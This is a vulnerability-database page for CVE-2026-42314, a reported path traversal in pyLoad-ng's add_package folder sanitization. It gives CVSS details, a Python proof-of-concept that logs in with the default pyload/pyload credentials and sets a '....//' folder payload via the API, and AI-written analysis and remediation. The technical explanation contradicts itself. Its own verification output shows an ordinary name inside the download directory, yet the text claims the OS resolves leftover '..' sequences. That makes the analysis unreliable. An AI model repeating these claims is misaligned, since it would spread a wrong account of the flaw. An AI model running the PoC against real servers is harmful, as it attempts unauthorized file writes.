Skip to main content

PyLoad-ng CVE-2026-42314

MEDIUM
Path Traversal (CWE-22)
2026-05-05 https://github.com/pyload/pyload GHSA-97r3-5w84-r4q8
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 21:45 vuln.today
Analysis Generated
May 05, 2026 - 21:45 vuln.today

DescriptionGitHub Advisory

Insufficient sanitization of package folder names allows writing files outside the intended download directory.

Affected Component

  • src/pyload/core/api/__init__.py
  • Function: add_package()

Description

Package folder names are sanitized using insufficient string replacement:

python
folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")
# Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")
)

The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.

Proof of Concept

Setup

bash
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload

Exploit

python
#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()
# Login
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})
# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test_package",
    "links": ["http://example.com/file.txt"],
    "dest": 1
# Destination.QUEUE
})

package_id = resp.json()
print(f"Created package: {package_id}")
# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})

print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")
# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")

Verification

Check where files would be written:

python
import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"
# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .._.._.._tmp_evil
# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/.._.._.._tmp_evil
# The .. sequences remain and could be resolved by OS during file operations

Impact

Authenticated users with ADD permission can:

  • Write files outside the download directory
  • Potentially overwrite system files (depending on permissions)
  • Clutter system directories with downloaded content

AnalysisAI

Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces ../ with _, but the pattern ....// bypasses this filter by becoming .._ after replacement, leaving exploitable .. sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.

Technical ContextAI

PyLoad-ng is a Python-based download manager with a REST API exposed on port 8000. The vulnerability exists in src/pyload/core/api/__init__.py within the add_package() function, which performs directory traversal sanitization on user-supplied package folder names using naive string replacement on the folder parameter. The sanitization chain (replacing http://, https://, ../, ..\ , :, /, \) is insufficient because it processes patterns sequentially; the ....// input becomes .._ after replacing ../ (removing only the first ../), then becomes .._.._.. after replacing / with _, leaving unescaped .. sequences. When PyLoad subsequently calls os.path.join(download_dir, sanitized_folder) and opens files, the operating system's path resolution interprets these remaining .. sequences as parent directory navigation, enabling arbitrary file write outside the configured download directory. The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) - the application trusts that string replacement is sufficient path validation without canonical path comparison.

RemediationAI

Upgrade PyLoad-ng to version 0.5.0b3.dev100 or later, which contains the corrected path sanitization logic. This is the vendor-released fix and should be applied immediately. If immediate upgrade is not feasible, implement the following compensating controls: (1) Restrict network access to the PyLoad API port (8000) using firewall rules, limiting exposure to trusted networks only - this eliminates AV:N but does not prevent local attacks. (2) Enforce strong unique credentials different from the default pyload/pyload and disable API access for accounts not requiring it. (3) Change the PyLoad download directory to a dedicated filesystem partition or subdirectory with restrictive permissions (mode 0700, owned by the pyload process user) to prevent parent directory traversal impact - files written to unexpected locations will still occur but will be confined to the partition. (4) Run PyLoad in a container or chroot jail with restricted filesystem namespace to isolate file writes. Note that none of these workarounds prevent the vulnerability itself; they reduce attack surface or contain damage. Patch application is strongly recommended. Monitor the GitHub advisory and PyPI release notes for additional fixes.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-42314 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy